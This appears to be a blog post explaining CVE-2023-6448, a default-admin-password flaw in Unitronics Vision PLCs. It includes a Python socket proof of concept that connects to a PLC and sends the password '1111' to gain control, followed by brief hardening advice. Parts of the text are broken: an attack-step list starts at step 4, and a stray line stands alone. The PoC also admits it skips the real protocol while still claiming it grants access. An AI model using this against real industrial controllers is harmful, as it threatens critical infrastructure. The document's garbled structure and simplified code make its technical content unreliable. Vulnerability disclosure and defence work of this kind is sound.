*Published: June 2024*

Introduction

Industrial control systems (ICS) quietly run our cities—factories, water plants, and transport all depend on Programmable Logic Controllers (PLCs) and Human Machine Interfaces (HMIs). When vulnerabilities pop up, the consequences can hit hard. In late 2023, a critical flaw tagged as CVE-2023-6448 was reported in Unitronics VisiLogic software, widely used to program PLCs like Vision and Samba models.

Let’s break down what happened, how hackers exploit this bug, and how the attack looks in practice. No jargon—just the facts, some sample code, and links to more information.

What's the Issue in CVE-2023-6448?

Unitronics VisiLogic (before version 9.9.00) uses a default, hardcoded administrative password when setting up new systems. Anyone on the same network can connect to the device and gain full control—no hacking skills, no guesswork, just “out of the box” access. No authentication, just the keys to the kingdom.

Affected Products

- Unitronics Vision PLCs: e.g. Vision120, Vision130, Vision350, Vision560, Vision570, Vision104, Vision121

Real-World Threat

If you have one of these PLCs/HMIs connected to your internal network or (worse) exposed to the internet, an attacker can:

Stop or change automation processes.

Think: Turning off pumps, shutting down alarms, or changing recipe values in a factory—all from afar, instantly, and without your permission.

Exploit in Action

The attack is easy and doesn't need much technical knowledge—just some basic networking. The default admin password (typically “1111”) can be used over TCP/IP to communicate with the device.

> 💡 *If you haven’t changed the default “1111” password on your devices, they’re likely at risk!*

Send login command with default admin password.

4. Gain full administrative access, allowing change/upload/download of PLC code.

Example: Using Python to Talk to a Vulnerable Unitronics Vision PLC

Below is a simple proof-of-concept (PoC) illustrating how an attacker could connect directly to a vulnerable PLC using Python sockets. (This is FOR DEMONSTRATION ONLY—do not use illegally or irresponsibly!)

You’ll need the device’s IP address and the default admin password.

import socket

IP = "192.168.1.100"     # Target PLC address
PORT = 20256             # Typical port for VisiLogic
DEFAULT_PASSWORD = b"1111"  # Default admin password

# Create socket and connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))

# Example: Send the default admin password as part of the login protocol
# (Unitronics protocol is simple, we send the password directly for this demo)
s.sendall(DEFAULT_PASSWORD)

# Receive the response (should grant access)
response = s.recv(1024)
print("[*] Received:", response.decode())

# Further administrative commands can be sent here...

s.close()

> Note: The full Unitronics protocol is more involved (see Unitronics protocol documentation), but this PoC highlights how trivial the authentication is when using the default password.

- CVE-2023-6448 entry (NVD)
- CISA ICS Advisory - ICSA-23-332-09
- Unitronics Security Notice
- VisiLogic Release History & Download (Get Updates!)


## How to Defend Your PLC/HMI

Restrict Network Access.

Segment your network and limit who can connect to your PLCs/HMIs. Never expose them directly to the public internet.

Why It Matters

Attacks on industrial devices are no longer science fiction. Simple misconfigurations—like leaving default passwords—let attackers walk right in. When it comes to critical infrastructure, the stakes are too high for that kind of oversight.

If you use VisiLogic before 9.9.00 (or manage sites where it’s used), check your devices today.

Summary

CVE-2023-6448 isn’t a complicated bug—it’s about careless default passwords, widespread in industrial automation. But the impact can be severe. By understanding and fixing this issue, you protect not just your gear, but the vital services that run on it.

Update, strengthen your passwords, and lock those doors!

*If you found this post helpful, consider sharing with plant managers, IT teams, or system integrators working with Unitronics products. Stay safe!*

Timeline

Published on: 12/05/2023 18:15:12 UTC
Last modified on: 12/13/2023 17:15:07 UTC